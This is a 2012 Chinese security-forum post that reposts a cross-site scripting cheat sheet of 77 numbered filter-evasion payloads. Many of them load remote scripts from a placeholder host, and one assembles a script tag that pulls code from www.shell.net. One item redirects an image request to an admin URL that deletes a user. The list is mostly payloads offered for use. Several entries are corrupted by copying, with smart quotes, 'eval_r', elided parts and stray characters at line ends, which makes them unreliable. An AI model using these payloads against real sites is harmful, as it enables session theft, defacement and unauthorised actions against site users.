找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3570|回复: 0
打印 上一主题 下一主题

xss跨站脚本攻击汇总

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-5 14:56:34 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。% Y$ S* G& j5 z9 f7 K4 \; R

( s1 K0 U( O0 \6 k (1)普通的XSS JavaScript注入! \  R7 M0 Z% I% b
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
! ?% v+ f; J. J5 @7 L( ]! v/ \/ Q" i( c0 d6 s# k
(2)IMG标签XSS使用JavaScript命令
5 O' J6 X( x' z  k0 T <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>% C2 s6 e( n8 X) k5 d- f; _
4 B7 S7 e! {% I
(3)IMG标签无分号无引号5 W" g# n0 f- f5 U1 e
<IMG SRC=javascript:alert(‘XSS’)>
' C1 K4 k, ^0 X+ X; _$ F. A7 J% H+ Z& Z
(4)IMG标签大小写不敏感) ]9 @$ \; }; w) K, k% i+ R
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
# U% |  p1 b2 q+ R! K& M- E9 `1 O
0 v, L; G. Q5 x+ P7 C* f! x (5)HTML编码(必须有分号)
. K( v% n6 w' J1 b$ C& Y4 { <IMG SRC=javascript:alert(“XSS”)>
( o% i" I( Y; Z1 g4 G. P
) n8 `) s: d& z6 j7 n, }1 l' R (6)修正缺陷IMG标签4 |! B. O0 l( o9 Y, d
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”># D( P! e) G+ d4 Z
0 k- e  K$ m* p" D4 p
(7)formCharCode标签(计算器)+ P/ K, ^/ T$ n9 r- ^
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
7 O9 u% o% F1 [: j1 F6 l2 {5 D# w$ P- Y3 ]% [5 }: n2 y) ^$ \
(8)UTF-8的Unicode编码(计算器)
/ Y5 H8 q2 e9 C) Y <IMG SRC=jav..省略..S')>
3 n4 y) x" F' _: p: E
2 |7 o" k+ n. u4 p; [2 ]+ l (9)7位的UTF-8的Unicode编码是没有分号的(计算器)! f+ n( w* Y( G3 c- E
<IMG SRC=jav..省略..S')>
5 q6 }# g. Z+ M- ^( H4 F/ \; v+ M! H$ k, g' m/ F
(10)十六进制编码也是没有分号(计算器)' \! x' i& d5 \: J1 W
<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>( n0 I1 P# F, U# }8 F$ h
8 C+ j; ~- V/ k  }% o4 V0 ]! j
(11)嵌入式标签,将Javascript分开
* k  u# w, A, K <IMG SRC=”jav ascript:alert(‘XSS’);”>3 K3 q$ g$ N# v8 d  e+ X

5 n" i# [9 O' _$ d$ y (12)嵌入式编码标签,将Javascript分开
) J9 D; T& S3 h: ?/ u <IMG SRC=”jav ascript:alert(‘XSS’);”>: i# u1 @, |* i! m' A
. R3 q4 u7 n$ i. V7 n
(13)嵌入式换行符) I: l! g; t  q
<IMG SRC=”jav ascript:alert(‘XSS’);”>/ k. v- O- A7 F7 H/ J* I) Q& Z( `
  l0 r. H1 L( O* c, j
(14)嵌入式回车
4 m( ^, u* R1 f/ f3 R <IMG SRC=”jav ascript:alert(‘XSS’);”>( _; T+ a& B5 y. [% ~

8 h* Y: `8 _- S: J (15)嵌入式多行注入JavaScript,这是XSS极端的例子
1 Y- ?3 b8 V/ Y, ~* w- s9 l* w <IMG SRC=”javascript:alert(‘XSS‘)”>9 h6 s8 b; b. g8 ], A7 e
9 ]( D4 \* }4 S. I
(16)解决限制字符(要求同页面)
! b) B( |+ L& I- ?$ T) }/ Z <script>z=’document.’</script>
1 N/ {2 I6 p2 L+ ?. o' \& @, [0 h( S <script>z=z+’write(“‘</script>
' F8 f) s( f8 m3 ^1 K: r6 p2 V- r) D <script>z=z+’<script’</script>' h6 S9 b6 X1 |4 s0 B4 y) O
<script>z=z+’ src=ht’</script>
7 k/ R* ?; _! `5 w8 I2 Y4 w+ @ <script>z=z+’tp://ww’</script>
7 M/ V# w( n1 B" h <script>z=z+’w.shell’</script>
7 n1 k, o! T) [3 P" x <script>z=z+’.net/1.’</script>
% H' I/ {2 t5 o <script>z=z+’js></sc’</script>
. n1 I' Q, v1 h$ t: `4 b <script>z=z+’ript>”)’</script>
; n* @5 m7 a1 n2 J+ l, B <script>eval_r(z)</script>
1 t- G) C* p0 e6 o( U" N. v
9 M* D; U7 r; j0 Y. V1 D (17)空字符
% k$ v' W9 [1 q5 [ perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
+ q$ U0 [* p! r! m' l
3 ?) |. Q6 Q3 }" G (18)空字符2,空字符在国内基本没效果.因为没有地方可以利用) I: Y# g$ i5 W! ~" o
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
  ^8 L" q3 i# @" X4 X" O: i, y
8 L7 X8 r; \! S" l  r (19)Spaces和meta前的IMG标签4 l" L" ?: w+ H
<IMG SRC=”   javascript:alert(‘XSS’);”>
' n1 T( M( B7 W2 ]- y( a  C
9 e2 G- B$ k4 b( W9 I5 ?; }/ s (20)Non-alpha-non-digit XSS/ K' s9 T$ m* l) [' J4 ]
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
/ ~% J9 A9 b  I1 C% t) Z, l% ^) G& }
(21)Non-alpha-non-digit XSS to 27 O% T1 r6 M1 O0 S
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>, z0 N) f. C$ q
5 q* k9 J  M: f2 V
(22)Non-alpha-non-digit XSS to 3
7 T/ F2 C) a2 a- s' s <SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
+ x; l5 D( c" P6 z1 x: S+ c
. U+ y( E) g. X* Z/ t5 l, } (23)双开括号
  R6 L# z. Y: b4 q <<SCRIPT>alert(“XSS”);//<</SCRIPT>
% A& {- X& c2 a& R5 p% v4 {7 m/ h" W
(24)无结束脚本标记(仅火狐等浏览器)
+ R, a' c  S2 |3 i, f3 d. ] <SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
9 F" x. R  D# ]. Z* g) L2 a
0 S9 a$ _2 a6 T* b5 _2 K$ R7 | (25)无结束脚本标记2
5 h! h% Y4 K% ~; Y) i! k  g <SCRIPT SRC=//3w.org/XSS/xss.js>
: X" Z3 d, Q! ~% A+ D; L
; j9 R: ]5 a& I (26)半开的HTML/JavaScript XSS
# l8 A0 n6 J. x" B* n& v <IMG SRC=”javascript:alert(‘XSS’)”
8 }5 J; ?) i5 P# q! T* y* }/ k* @, q& D" r; f# x+ A; ~
(27)双开角括号
: u7 j* s; t" }7 b+ n <iframe src=http://3w.org/XSS.html <
- b: {; y/ @/ ?. s/ ]9 s$ Q" U+ Y0 A8 {8 v, R
(28)无单引号 双引号 分号
# v/ Z  _) W4 G" P( n  q! ]6 \ <SCRIPT>a=/XSS/
* X0 F6 m; \, } alert(a.source)</SCRIPT>
+ {1 T8 e0 N( P2 I9 H+ S2 \0 m2 i) `) Q9 d, S, T
(29)换码过滤的JavaScript, R, x: I1 t. y/ c4 q) K
\”;alert(‘XSS’);//. x5 B) h5 T# J6 d, o- g9 r
, {1 D2 S8 R* w* ~- k" [' o
(30)结束Title标签
  S' Z+ F. I, ?" r: Z/ }, Z </TITLE><SCRIPT>alert(“XSS”);</SCRIPT>' N; Q% v- W) Q' S9 v

- y8 [  W- A# G8 T, y3 b! h: ` (31)Input Image
) h% Y# ~# c% v+ W; D <INPUT SRC=”javascript:alert(‘XSS’);”>
( i1 y5 F$ L  G7 ]. a
& y2 E# }5 F3 ^' V (32)BODY Image: d  B6 J# N+ ^" ^
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>0 @: @5 `0 q7 I5 j' h, ~
& |( x! z* u+ z; a
(33)BODY标签- o  N% B  V0 W! k- J" @$ w
<BODY(‘XSS’)>' c+ p/ {2 }, z% z9 e
( s) S: u4 j# l- w/ U( U1 Y
(34)IMG Dynsrc
0 G# U9 y% a3 M- a0 G) v <IMG DYNSRC=”javascript:alert(‘XSS’)”>
& R3 F. m  X9 A3 @7 w& K
' a' r( U; t* m0 A (35)IMG Lowsrc
/ V; y8 L! Z# E; P* z <IMG LOWSRC=”javascript:alert(‘XSS’)”>
6 x. Q4 E3 `: u% \$ s; L" J, t! O8 u; z' a7 p
(36)BGSOUND
6 }& A8 {" l) q8 g0 ~9 k <BGSOUND SRC=”javascript:alert(‘XSS’);”>4 _! w! @, ~3 N8 R% h5 m6 H; L5 g

9 j! H8 C( m3 W7 ~) X$ r9 Y (37)STYLE sheet
- Z2 _0 T2 B0 y" p3 |' T7 B <LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>  h% U3 E) v% y

  Q4 D. K! a8 a0 E- O6 l (38)远程样式表
; h+ d8 r, ~0 t0 o <LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
* I+ ~. s( ?$ Z, w
- c  B! P5 M  d; p( k% q3 d (39)List-style-image(列表式)1 v& h( m. b( F
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS1 E  \  M$ ^0 t8 L" S7 M) ~% \4 H+ R

; d: V/ U4 ~1 e( f- I (40)IMG VBscript$ G1 s0 i. i& n3 e8 J
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
2 O7 ?' m+ L" A% D
6 s* U* L/ Q: x5 t, p# L (41)META链接url, j( \5 k& V% ~$ C! Y7 J
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>/ D1 e! }$ X  z. |
% q/ c9 k2 o0 E' M% N% L- Z- \
(42)Iframe; [5 Y- a: A$ x* H$ _
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
$ t( I" T% x, K; x- c# I0 Z' S
/ \% C9 O3 _9 Z8 ]7 |7 V, c (43)Frame8 \" \; i8 c! ]
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>) [9 N3 _1 C& S

/ C0 F0 H$ A9 @+ x) a* c2 Y (44)Table# s6 S9 ~# v/ I9 X* r
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
' K. I) y! [" @: d% l7 z* v! }/ _& c7 d% d
(45)TD- A( {5 V% F# T1 T: G0 W
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>% Q! w9 Z( G6 M" S2 h5 y9 P
* |1 w: y0 f# m
(46)DIV background-image3 Q0 \' F$ x3 r+ T3 @) T
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
( H1 r0 @# u0 M  K( x6 a2 [- L0 v, M2 G( ^
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)! O  h( s- e& k# e
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>+ f( ]$ r* P$ |1 U% k7 F6 X  w# G
- |9 ^1 z) `  {# |
(48)DIV expression
4 K, u3 u  {6 ?3 A5 a <DIV STYLE=”width: expression_r(alert(‘XSS’));”>
1 A3 m0 p9 W: {' G; f) v* w6 P/ V& r( j* ^
(49)STYLE属性分拆表达
+ Y2 @. B) m0 K  r8 b3 S" t <IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
/ n1 G, y/ Z7 U& Y/ G0 k9 _
5 z, C- e" g: N2 {. L, Q (50)匿名STYLE(组成:开角号和一个字母开头)
5 H; v+ Q* v5 P+ k <XSS STYLE=”xss:expression_r(alert(‘XSS’))”>& ]' t( v  L- n8 T# u0 \$ K3 h: G+ ]
2 _3 V( |8 |2 R* \
(51)STYLE background-image3 t( V$ m& F8 _+ K( n* {% ~8 l$ L
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>5 l: x% Z% p6 y* R0 l) H

( ?. t  q8 F0 D# n5 C" k1 z (52)IMG STYLE方式: S; f# C- t0 K, _4 J. Q
exppression(alert(“XSS”))’># d2 g( U; m. U; I. e
! e3 L1 B5 q" Y& c2 Y
(53)STYLE background4 P! `) _: ~# j2 k
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>  O1 K# B7 o% g) S! C- u5 {) |6 M& }
* Z! _4 X( c/ U) K' O5 B" U1 x
(54)BASE9 v1 N% j6 c7 X4 u4 j8 w& M
<BASE HREF=”javascript:alert(‘XSS’);//”>% N. T' b" E; z* ~; {' A- U

( @' M9 \. H4 o4 K6 e' I (55)EMBED标签,你可以嵌入FLASH,其中包涵XSS) F! K. u9 \& l. K
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
# o3 [. B/ V% k% D  |' C! c* j) t
6 P  e4 I( ?$ e+ W (56)在flash中使用ActionScrpt可以混进你XSS的代码! h; d- F2 T) F
a=”get”;: X" _; [6 ^- _5 s6 ^- b7 ]1 a
b=”URL(\”";5 M! \/ W; o# ?
c=”javascript:”;
% q2 ?6 A# w6 r6 z1 w d=”alert(‘XSS’);\”)”;
9 s7 i5 |0 `2 z8 s+ m eval_r(a+b+c+d);
& K) f& N0 g$ h/ {* }4 N$ e. ]+ U5 E# q; N
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上8 n; f) e+ Q2 `( \! G9 C
<HTML xmlns:xss>9 Y  Z& t0 D! W. T" e  `5 l
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>  f/ U  Z; N+ {- e1 ]' c1 W7 ]
<xss:xss>XSS</xss:xss>
! H0 J: k6 x5 H1 g& l9 _ </HTML>- ~& q& B  E0 j' Z3 E
. r' p, q, R: C, f# g. D
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用+ Z9 c( M$ ^( z1 {, u' t
<SCRIPT SRC=””></SCRIPT>  a5 F7 |; \3 `3 `8 o, I

6 b: j/ W0 o' [. @& |- F. W (59)IMG嵌入式命令,可执行任意命令# j  t' K+ k5 S# `6 K3 {
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
2 B: m! e+ p% H' [; H1 Y8 }( a& W' T% R# V- Z- K7 h2 |
(60)IMG嵌入式命令(a.jpg在同服务器)* C& d0 F- }9 _  E
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser( t9 B+ v$ v5 g
7 Q2 G  {' K2 G7 H
(61)绕符号过滤% A0 E! f: ^; ~' t! U, H1 y
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
" q. T% \: |5 [4 c! t' z! H+ m, z+ ^' v/ |8 z
(62)5 p2 N% o2 I3 P/ x! n& q) o( M
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>1 S4 W0 O: S. f1 K  K

& _% M3 v5 b! Q' @2 [. K! ^ (63)  I5 H  h% X; M# S2 O' q
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
8 V) N3 c1 ?# z, ?  \; R" p6 E9 d7 e2 E& f
(64)! R! C% J/ @0 N
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>7 @. n8 B, H$ ~7 `1 h' F

1 o$ }9 M4 x; H/ d- H (65)
' p- l; c# j4 I2 z1 Q <SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
( Z, z+ X: x4 B5 a+ P+ V
" W+ e  w! K% h9 | (66)4 a. M* l; Q5 W2 U0 N3 ?
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>$ m* @- u. e$ Y/ @+ a- I
( M5 o, e0 R& z* C0 \- g4 Y
(67)! f0 H& k# |' Y4 [8 x
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
1 F* Z2 p2 |3 H0 e1 `) Y
( R8 Z3 o) \; t) t; e* ?% m (68)URL绕行
, W+ w# E" U; Q" W/ a+ _9 `# c <A HREF=”http://127.0.0.1/”>XSS</A>! x2 C+ A* {3 f- [1 V& P* P
7 h  e% j! v) p$ `2 g/ E3 I2 R
(69)URL编码
6 W3 Y: H8 ?2 r. f- J <A HREF=”http://3w.org”>XSS</A>
) M& Z# g. d' x: f$ D+ u. y0 j; m6 s: H; ~9 m* `) V
(70)IP十进制
+ G* D7 h. s8 D. W3 \& j <A HREF=”http://3232235521″>XSS</A>
& l" R! H" l: Z$ z' p, k5 D3 U( \
(71)IP十六进制, I2 G: X& ^2 P/ W% c
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
: p  G: k- }( r. ]: M& n4 @  r6 h  V7 A: _' v7 B: V( S9 T+ f
(72)IP八进制7 U. |7 A1 a) b% S6 A+ r
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
  z* r9 F$ g% S! i; F
6 }; G7 e7 s+ R! F4 ^ (73)混合编码
  b/ C" P, P6 d( v+ P3 d/ M <A HREF=”h
* X; H! Q$ {& V0 B. Q9 Q tt p://6 6.000146.0×7.147/”">XSS</A>( x* S$ J9 }: v5 h+ V* O) E
1 H6 K! X, d8 P/ A
(74)节省[http:]% D& f8 z: _. l2 a; Z. ^# w: S
<A HREF=”//www.google.com/”>XSS</A>- B" D3 }# \8 r, F: e0 W+ v

8 ?  o" M% H/ `2 O4 E; ] (75)节省[www]
+ J! w2 O) y! P <A HREF=”http://google.com/”>XSS</A>
7 E" a; Z0 J# U& a0 Z4 D$ x+ ^: f. y& i
(76)绝对点绝对DNS, e# S* d4 h& E* i
<A HREF=”http://www.google.com./”>XSS</A>
  c; h# W+ E1 @- r( p" s2 b1 m% Y& {6 S3 q
(77)javascript链接
+ X+ V% e0 [5 o# o7 l <A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表